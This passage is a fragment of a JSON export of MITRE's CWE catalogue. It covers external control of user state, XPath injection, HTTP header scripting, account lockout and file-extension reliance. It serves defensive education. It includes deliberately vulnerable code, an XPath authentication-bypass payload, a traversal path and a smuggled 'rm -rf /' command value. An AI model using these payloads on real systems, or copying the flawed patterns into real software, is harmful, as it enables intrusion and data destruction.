affect state directly in any way other than through legitimate actions leading to state transitions."},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","With a stateless protocol such as HTTP, use some frameworks can maintain the state for you.","Examples include ASP.NET View State and the OWASP ESAPI Session Management feature.","Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"authenticated\\") &amp;&amp; Boolean.TRUE.equals(c.getValue())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-65"},"Intro_Text":"The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as \\"../../tomcat/conf/server.xml\\", which causes the application to delete one of its own configuration files (CWE-22).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String rName = request.getParameter(\\"reportName\\");File rFile = new File(\\"/usr/local/apfr/reports/\\" + rName);...rFile.delete();","xhtml:br":["","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-66"},"Intro_Text":"The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"fis = new FileInputStream(cfg.getProperty(\\"sub\\")+\\".txt\\");amt = fis.read(arr);out.println(arr);","xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-67"},"Intro_Text":"This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define DIR \\"/restricted/directory\\"char cmd[500];sprintf(cmd, \\"ls -l %480s\\", DIR);RaisePrivileges(...);system(cmd);DropPrivileges(...);...","xhtml:br":["","","","","","","","",""],"xhtml:i":"/* Raise privileges to those needed for accessing DIR. */"}},{"attr":{"@_Nature":"attack"},"xhtml:ul":{"xhtml:li":["The user sets the PATH to reference a directory under the attacker\'s control, such as \\"/my/dir/\\".","The attacker creates a malicious program called \\"ls\\", and puts that program in /my/dir","The user executes the program.","When system() is executed, the shell consults the PATH to find the ls program","The program finds the attacker\'s malicious program, \\"/my/dir/ls\\". It doesn\'t find \\"/bin/ls\\" because PATH does not contain \\"/bin/\\".","The program executes the attacker\'s malicious program with the raised privileges."]}}],"Body_Text":["This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can\'t control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges.","However, because the program does not modify the PATH environment variable, the following attack would work:"]},{"Intro_Text":"The following code segment implements a basic server that uses the \\"ls\\" program to perform a directory listing of the directory that is listed in the \\"HOMEDIR\\" environment variable. The code intends to allow the user to specify an alternate \\"LANG\\" environment variable. This causes \\"ls\\" to customize its output based on a given language, which is an important capability when supporting internationalization.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$ENV{\\"HOMEDIR\\"} = \\"/home/mydir/public/\\";my $stream = AcceptUntrustedInputStream();while (&lt;$stream&gt;) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"chomp;if (/^ENV ([\\\\w\\\\_]+) (.*)/) {}elsif (/^QUIT/) { ... }elsif (/^LIST/) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"$ENV{$1} = $2;","attr":{"@_style":"margin-left:10px;"}},{"#text":"open($fh, \\"/bin/ls -l $ENV{HOMEDIR}|\\");while (&lt;$fh&gt;) {}close($fh);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"SendOutput($stream, \\"FILEINFO: $_\\");","attr":{"@_style":"margin-left:10px;"}}}]}}}},"Body_Text":["The programmer takes care to call a specific \\"ls\\" program and sets the HOMEDIR to a fixed value. However, an attacker can use a command such as \\"ENV HOMEDIR /secret/directory\\" to specify an alternate directory, enabling a path traversal attack (CWE-22). At the same time, other attacks are enabled as well, such as OS command injection (CWE-78) by setting HOMEDIR to a value such as \\"/tmp; rm -rf /\\". In this case, the programmer never intends for HOMEDIR to be modified, so input validation for HOMEDIR is not the solution. A partial solution would be an allowlist that only allows the LANG variable to be specified in the ENV command. Alternately, assuming this is an authenticated user, the language could be stored in a local file so that no ENV command at all would be needed.","While this example may not appear realistic, this type of problem shows up in code fairly frequently. See CVE-1999-0073 in the observed examples for a real-world example with similar behaviors."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2428","Description":"Mail client stores password hashes for unrelated accounts in a hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2428"},{"Reference":"CVE-2008-0306","Description":"Privileged program trusts user-specified environment variable to modify critical configuration settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0306"},{"Reference":"CVE-1999-0073","Description":"Telnet daemon allows remote clients to specify critical environment variables for the server, leading to code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0073"},{"Reference":"CVE-2007-4432","Description":"Untrusted search path vulnerability through modified LD_LIBRARY_PATH environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4432"},{"Reference":"CVE-2006-7191","Description":"Untrusted search path vulnerability through modified LD_LIBRARY_PATH environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7191"},{"Reference":"CVE-2008-5738","Description":"Calendar application allows bypass of authentication by setting a certain cookie value to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5738"},{"Reference":"CVE-2008-5642","Description":"Setting of a language preference in a cookie enables path traversal attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5642"},{"Reference":"CVE-2008-5125","Description":"Application allows admin privileges by setting a cookie value to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5125"},{"Reference":"CVE-2008-5065","Description":"Application allows admin privileges by setting a cookie value to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5065"},{"Reference":"CVE-2008-4752","Description":"Application allows admin privileges by setting a cookie value to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4752"},{"Reference":"CVE-2000-0102","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0102"},{"Reference":"CVE-2000-0253","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0253"},{"Reference":"CVE-2008-1319","Description":"Server allows client to specify the search path, which can be modified to point to a program that the client has uploaded.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1319"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-528"}},{"attr":{"@_External_Reference_ID":"REF-529"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 4: Use of Magic URLs, Predictable Cookies, and Hidden Form&#xA;                  Fields.&#34; Page 75"}}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Relevant_Properties, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Insufficient Management of User State","attr":{"@_Date":"2008-04-11"}},{"#text":"External Control of User State Data","attr":{"@_Date":"2009-01-12"}}]}},"643":{"attr":{"@_ID":"643","@_Name":"Improper Neutralization of Data within XPath Expressions (\'XPath Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to dynamically construct an XPath expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.","Extended_Description":"The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"91","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Controlling application flow (e.g. bypassing authentication)."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The attacker could read restricted XML content."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use parameterized XPath queries (e.g. using XQuery). This will help ensure separation between data plane and control plane."},{"Phase":"Implementation","Description":"Properly validate user input. Reject data where appropriate, filter where appropriate and escape where appropriate. Make sure input that will be used in XPath queries is safe in that context."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the following simple XML document that stores authentication information and a snippet of Java code that uses XPath query to retrieve authentication information:","Example_Code":[{"attr":{"@_Nature":"informative","@_Language":"XML"},"xhtml:div":{"#text":"&lt;users&gt;&lt;/users&gt;","xhtml:div":{"#text":"&lt;user&gt;&lt;/user&gt;&lt;user&gt;&lt;/user&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;login&gt;john&lt;/login&gt;&lt;password&gt;abracadabra&lt;/password&gt;&lt;home_dir&gt;/home/john&lt;/home_dir&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"&lt;login&gt;cbc&lt;/login&gt;&lt;password&gt;1mgr8&lt;/password&gt;&lt;home_dir&gt;/home/cbc&lt;/home_dir&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"XPath xpath = XPathFactory.newInstance().newXPath();XPathExpression xlogin = xpath.compile(\\"//users/user[login/text()=\'\\" + login.getUserName() + \\"\' and password/text() = \'\\" + login.getPassword() + \\"\']/home_dir/text()\\");Document d = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new File(\\"db.xml\\"));String homedir = xlogin.evaluate(d);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"//users/user[login/text()=\'john\' or \'\'=\'\' and password/text() = \'\' or \'\'=\'\']/home_dir/text()"}],"Body_Text":["The Java code used to retrieve the home directory based on the provided credentials is:","Assume that user \\"john\\" wishes to leverage XPath Injection and login without a valid password. By providing a username \\"john\\" and password \\"\' or \'\'=\'\\" the XPath expression now becomes","which, of course, lets user \\"john\\" login without a valid password, thus bypassing authentication."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":39,"Entry_Name":"XPath Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-531"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;XPath Injection&#34;, Page 1070"}}]},"Notes":{"Note":{"#text":"This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, References, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Unsafe Treatment of XPath Input","attr":{"@_Date":"2008-10-14"}},{"#text":"Failure to Sanitize Data within XPath Expressions (aka \'XPath injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data within XPath Expressions (\'XPath injection\')","attr":{"@_Date":"2010-04-05"}}]}},"644":{"attr":{"@_ID":"644","@_Name":"Improper Neutralization of HTTP Headers for Scripting Syntax","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash.","Extended_Description":{"xhtml:p":["An attacker may be able to conduct cross-site scripting and other attacks against users who have these components enabled.","If an application does not neutralize user controlled data being placed in the header of an HTTP response coming from the server, the header may contain a script that will get executed in the client\'s browser context, potentially resulting in a cross site scripting vulnerability or possibly an HTTP response splitting attack. It is important to carefully control data that is being placed both in HTTP response header and in the HTTP response body to ensure that no scripting syntax is present, taking various encodings into account."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Run arbitrary code."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Attackers may be able to obtain sensitive information."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Perform output validation in order to filter/escape/encode unsafe data that is being passed from the server in an HTTP response header."},{"Phase":"Architecture and Design","Description":"Disable script execution functionality in the clients\' browser."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example, user-controlled data is added to the HTTP headers and returned to the client. Given that the data is not subject to neutralization, a malicious user may be able to inject dangerous scripting tags that will lead to script execution in the client browser.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"response.addHeader(HEADER_NAME, untrustedRawInputData);"}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-3918","Description":"Web server does not remove the Expect header from an HTTP request when it is reflected back in an error message, allowing a Flash SWF file to perform XSS attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":[{"#text":"Insufficient Filtering of HTTP Headers for Scripting Syntax","attr":{"@_Date":"2008-10-14"}},{"#text":"Insufficient Sanitization of HTTP Headers for Scripting Syntax","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of HTTP Headers for Scripting Syntax","attr":{"@_Date":"2010-04-05"}}]}},"645":{"attr":{"@_ID":"645","@_Name":"Overly Restrictive Account Lockout Mechanism","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains an account lockout protection mechanism, but the mechanism is too restrictive and can be triggered too easily, which allows attackers to deny service to legitimate users by causing their accounts to be locked out.","Extended_Description":"Account lockout is a security feature often present in applications as a countermeasure to the brute force attack on the password based authentication mechanism of the system. After a certain number of failed login attempts, the users\' account may be disabled for a certain period of time or until it is unlocked by an administrator. Other security events may also possibly trigger account lockout. However, an attacker may use this very security feature to deny service to legitimate system users. It is therefore important to ensure that the account lockout security mechanism is not overly restrictive.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"Users could be locked out of accounts."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Implement more intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name."},{"Phase":"Architecture and Design","Description":"Implement a lockout timeout that grows as the number of incorrect login attempts goes up, eventually resulting in a complete lockout."},{"Phase":"Architecture and Design","Description":"Consider alternatives to account lockout that would still be effective against password brute force attacks, such as presenting the user machine with a puzzle to solve (makes it do some computation)."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder\'s account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"2"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Enabling_Factors_for_Exploitation, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"646":{"attr":{"@_ID":"646","@_Name":"Reliance on File Name or Extension of Externally-Supplied File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion.","Extended_Description":"An application might use the file name or extension of of a user-supplied file to determine the proper course of action, such as selecting the correct process to which control should be passed, deciding what data should be made available, or what resources should be allocated. If the attacker can cause the code to misclassify the supplied file, then the wrong action could occur. For example, an attacker could supply a file that ends in a \\".php.gif\\" extension that appears to be a GIF image, but would be processed as PHP code. In extreme cases, code execution is possible, but the attacker could also cause exhaustion of resources, denial of service, exposure of debug or system data (including application source code), or being bound to a particular server side process. This weakness may be due to a vulnerability in any of the technologies used by the web and application servers, due to misconfiguration, or resultant from another flaw in the application itself.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web 